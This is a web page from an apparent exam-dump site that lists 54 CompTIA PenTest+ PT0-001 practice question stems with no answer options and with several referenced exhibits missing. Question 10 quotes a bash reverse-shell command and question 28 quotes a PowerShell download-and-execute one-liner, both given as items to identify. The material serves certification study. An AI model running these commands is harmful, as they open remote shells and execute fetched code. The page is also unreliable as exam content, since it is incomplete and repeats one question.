post page top logo

Up-to-dated  PenTest+ (Plus) Certification | CompTIA IT Certifications Exam Dumps with free PT0-001 Exam Questions

Practice on 2022 updated CompTIA PenTest+ Dumps offered by Certspilot, Our free practice questions will help you in preparation for your CompTIA PenTest+ Exam. You can Download a Complete set of CompTIA PenTest+ PT0-001Dumps from our site, Our PT0-001 PDF contains real exam questions with verified answers and detailed explanations of each answer which help you in understanding the concepts of exam. Learn more about here CompTIA certification Roadmap.

Our below Practice questions will help you in passing your PT0-001 exam on the first attempt.

CompTIA PenTest+ (Plus) PT0-001 Free Dumps Are below let Practice on Free Updated PT0-001 Practice exam.

1. A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

2. A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

3. A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In

which of the following areas of the report should the penetration tester put this?

4. A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

5. A penetration tester wants to launch a graphic console window from a remotely compromised host with IP and display the terminal on the local computer with IP Which of the following would accomplish this task?

6. A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

7. A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

8. A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

9. Which of the following are MOST important when planning for an engagement? (Select TWO).

10. The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/ 0> &1

Which of the following describes what the command does?

11. Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

12. During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

13. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the

following would BEST meet this goal?

14. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ’’changepass.”

-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings" to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass exit

setuid strcmp GLIBC_2.0 ENV_PATH

%s/changepw malloc strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

15. A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

16. Given the following Python script:

Which of the following is where the output will go?

17. An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

18. A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

19. While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

Which of the following remediation steps should be taken to prevent this type of attack?

20. A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

21. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

22. A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

23. An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

24. A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

25. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

26. A penetration tester is performing a code review. Which of the following testing techniques is being performed?

27. During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

28. Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1”);Invoke-Cmdlet

Which of the following BEST describes the actions performed by this command?

29. Which of the following excerpts would come from a corporate policy?

30. In which of the following scenarios would a tester perform a Kerberoasting attack?

31. While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

32. A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

33. Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?

34. In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

35. A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

36. A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?

37. If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8

Which of the following formats is the correct hash type?

38. During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.

Which of the following would be the BEST target for continued exploitation efforts?

39. Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?

40. Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?

41. A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

42. An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following types of attacks is this an example of?

43. A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

44. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

45. During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?

46. A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

47. A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

48. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

49. A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

50. An assessor begins an internal security test of the Windows domain The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

51. Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)


52. A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

53. A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

54. A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?


Download full version

Related Exams

About The Author


Certspilot is a platform where you can get to access to free Practice test questions for all IT certification like Microsoft, AWS, CompTIA, Salesforce, Cisco, CISSP and others certifications exam, you can download Updated and Valid Exam Dumps in PDF format and prepare yourself for certification exam in very short time. If you have any other question or need assistance regarding to your certification exam, click on Live Chat Icon and get in touch with our customer support agent, we are available 24/7 for customer support or send email at

Leave a Comment